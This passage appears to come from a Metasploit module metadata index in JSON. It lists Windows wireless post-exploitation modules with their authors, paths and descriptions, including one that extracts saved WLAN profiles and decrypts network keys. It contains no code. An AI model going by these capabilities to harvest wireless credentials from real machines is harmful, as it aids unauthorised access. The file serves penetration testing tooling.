"ref_name": "windows/wlan/wlan_bss_list",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/wlan/wlan_current_connection": {
"name": "Windows Gather Wireless Current Connection Info",
"full_name": "post/windows/wlan/wlan_current_connection",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"theLightCosine <theLightCosine@metasploit.com>"
],
"description": "This module gathers information about the current connection on each\n wireless lan interface on the target machine.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/wlan/wlan_current_connection.rb",
"is_install_path": true,
"ref_name": "windows/wlan/wlan_current_connection",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/wlan/wlan_disconnect": {
"name": "Windows Disconnect Wireless Connection",
"full_name": "post/windows/wlan/wlan_disconnect",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"theLightCosine <theLightCosine@metasploit.com>"
],
"description": "This module disconnects the current wireless network connection\n on the specified interface.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/wlan/wlan_disconnect.rb",
"is_install_path": true,
"ref_name": "windows/wlan/wlan_disconnect",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/wlan/wlan_probe_request": {
"name": "Windows Send Probe Request Packets",
"full_name": "post/windows/wlan/wlan_probe_request",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Borja Merino <bmerinofe@gmail.com>"
],
"description": "This module sends probe requests through the wlan interface.\n The ESSID field will be used to set a custom message.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-05-03 11:41:09 +0000",
"path": "/modules/post/windows/wlan/wlan_probe_request.rb",
"is_install_path": true,
"ref_name": "windows/wlan/wlan_probe_request",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/wlan/wlan_profile": {
"name": "Windows Gather Wireless Profile",
"full_name": "post/windows/wlan/wlan_profile",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"theLightCosine <theLightCosine@metasploit.com>"
],
"description": "This module extracts saved Wireless LAN profiles. It will also try to decrypt\n the network key material. Behavior is slightly different between OS versions\n when it comes to WPA. In Windows Vista/7 we will get the passphrase. In\n Windows XP we will get the PBKDF2 derived key.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-09-17 16:00:04 +0000",
"path": "/modules/post/windows/wlan/wlan_profile.rb",
"is_install_path": true,
"ref_name": "windows/wlan/wlan_profile",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
}
}